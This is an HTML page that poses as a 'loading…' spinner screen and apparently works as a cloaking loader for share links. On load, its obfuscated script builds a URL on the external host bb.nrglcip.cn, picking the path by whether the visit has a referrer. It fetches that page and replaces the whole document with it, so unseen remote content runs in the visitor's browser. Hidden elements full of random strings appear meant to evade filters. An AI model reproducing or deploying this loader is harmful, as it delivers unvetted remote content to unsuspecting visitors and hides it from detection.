<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UcaWlh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UcaWlh .DHDSDAn {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UcaWlh .content {
            line-height: 50px;
            text-align: center
        }

        .UcaWlh .img {
            width: 100%
        }

        .UcaWlh .MCY3uSH {
            text-align: center
        }

        .UcaWlh .MCY3uSH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UcaWlh .MCY3uSH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UcaWlh .MCY3uSH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UcaWlh .MCY3uSH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UcaWlh .MCY3uSH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UcaWlh .MCY3uSH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UcaWlh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qwnsiRWt7LYxJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RrB5Qa = qwnsiRWt7LYxJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RrB5Qa +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RrB5Qa +".html?a=share";
		}
		
        lSvq9dpe08=url+"#"+new Date().getTime();
        lSvq9dpe08 && function() {
            $.get(lSvq9dpe08, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >P0RREHCIVnldUkitbKCBzTmX3kSQSuWZivnpPS</b>
<a  href='#' style='display:none'>KToS8p5jFKTgdq31LN2IskjHQz46m</a>
<div style='display:none'>PooYNorFnEr1F</div>
<span style='display:none'>HSGp0YATGnjuLVkvEmNxTgNLIMsiqml6xpnOWu6tyVAGLkpZl5FXWBUPcIuPl1b7l1lkPTMhp</span>
<h1 style='display:none' >aPkWemvAVlWTD7V6oftqBNrwcqSFtIYpMvpDJSfh1SwRnOtK4uBAsAGAds1V2A3D8Jkh51y4hkg5TL8T7CIQkfbFMBbr</h1>
<p  style='display:none'>AvNYn58dxMvi5LzB0QJAUiwAkoPVqPPwzcC4OrGRpfRr18sBYDDnrfPyhTfrJVGewZot4j4w34NhXc9Z9l1QFWcHcz17lY</p>
<a  href='#' style='display:none'>KToS8p5jFKTgdq31LN2IskjHQz46m</a><div class="UcaWlh">
    <div class="DHDSDAn">
        <div class="MCY3uSH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<b style='display:none' >WsfcbLTMWosvmdU75UQppRTFMh7ps66tOGiR23mG8Q5WzULI</b>
<h1 style='display:none' >lCQS8N9qkrpmmLzPxBNIVj5g0XtsTMjJrAFmUjmtSM4wpgivt8Kpt9AOGCxPUHhmkyxXqHzHi3F5HUKQAWuQTPHXDb</h1>
<a  href='#' style='display:none'>yQreKNkyBXOfnZ4rXkZXOEcANIix0w6FMiARxojm</a>
<a  href='#' style='display:none'>yQreKNkyBXOfnZ4rXkZXOEcANIix0w6FMiARxojm</a>
<div style='display:none'>BZHqqVJmieW5Kz8P1hz2jw99zRsjpKQ0FANs3o5r</div>
<p  style='display:none'>wZnbKDIEVs3LU</p>
<ul style='display:none' >FRzS5RMw1cqbaVYovXbYFNPB</ul></body>
</html>